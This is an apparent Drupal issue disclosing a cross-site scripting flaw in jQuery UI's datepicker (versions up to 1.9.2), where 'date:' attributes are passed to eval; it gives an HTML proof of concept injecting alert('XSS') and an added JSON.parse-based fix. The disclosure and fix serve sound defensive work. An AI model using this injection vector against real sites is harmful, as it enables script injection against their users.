- Issue created by @dokumori
Originally reported to the Drupal security team by phatly27 on 18 October 2015. Disclosing the information on the vulnerability as per psa-2022-03-09.
VULNERABILITY DETAILS
A potential bug enables us to inject XSS content into an attribute (with the format "date:[PROPERTY_IN_DEFAULTS_DATEPICKER]") on any HTML element using the _attachDatepicker function of the UI datepicker component. This function uses the eval syntax to evaluate JavaScript code dynamically.
VERSION
Any site using older versions, from version 1.9.2 back to the lowest version.
REPRODUCTION CASE
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title></title>
    <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
    <script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
    <script>
      $(document).ready(function () {
        $.datepicker.setDefaults({
          buttonText: 'abcde'
        });
        $.datepicker._attachDatepicker(document.getElementById("abc"));
        $('#datepicker').datepicker();
      });
    </script>
  </head>
  <body>
    <div id="abc" date:buttonText="alert('XSS')">
      <input name="datepicker" id="datepicker" type="text"/>
    </div>
  </body>
</html>
IN CONCLUSION
We expect that the alert popup should not be displayed and that the eval syntax should be removed instead. If it displays, any attacker can take advantage of it to inject malicious XSS content into the website.
Please see details here: http://jsfiddle.net/wanc8t9g/
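The report above describes _attachDatepicker reading "date:<option>" attributes and passing their values to eval. The following is an added example, not jQuery UI's or the reporter's code: it models that attribute lookup with JSON.parse in place of eval, so an attribute value is only ever treated as data. The attribute map, option names and function names are constructed for the example.

```javascript
// Added example (not jQuery UI code): a defensive version of the
// "date:<option>" attribute lookup that the report describes, with
// JSON.parse used in place of eval so attribute values are treated as
// data and never executed.

// Default datepicker options, mirroring the setDefaults() call in the report.
const DEFAULTS = { buttonText: 'abcde', numberOfMonths: 1, changeYear: false };

// Plain-data stand-in for an element's attribute map, constructed for the
// example instead of reading a real DOM node.
const sampleAttributes = {
  id: 'abc',
  'date:buttonText': "alert('XSS')",   // the attacker-controlled value from the PoC
  'date:numberOfMonths': '2',
  'date:changeYear': 'true',
  'date:notAnOption': '1'              // unknown option: ignored
};

// Parse one attribute value as JSON; fall back to the raw string if it is
// not valid JSON. Nothing here evaluates the value as code.
function parseOptionValue(raw) {
  try {
    return JSON.parse(raw);
  } catch (e) {
    return raw;
  }
}

// Collect "date:<name>" attributes whose <name> is a known default option.
function attributeOptions(attrs, defaults) {
  const options = {};
  for (const name of Object.keys(defaults)) {
    const raw = attrs['date:' + name];
    if (raw !== undefined) {
      options[name] = parseOptionValue(raw);
    }
  }
  return options;
}

// The offending value comes back as a plain string rather than running.
const parsed = attributeOptions(sampleAttributes, DEFAULTS);
console.log(parsed);
// { buttonText: "alert('XSS')", numberOfMonths: 2, changeYear: true }
```

Dropping eval only stops the value from being executed at parse time; any option that is later written into markup (buttonText, for instance) still needs HTML escaping when the widget renders it.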
Status: Active
Component: Code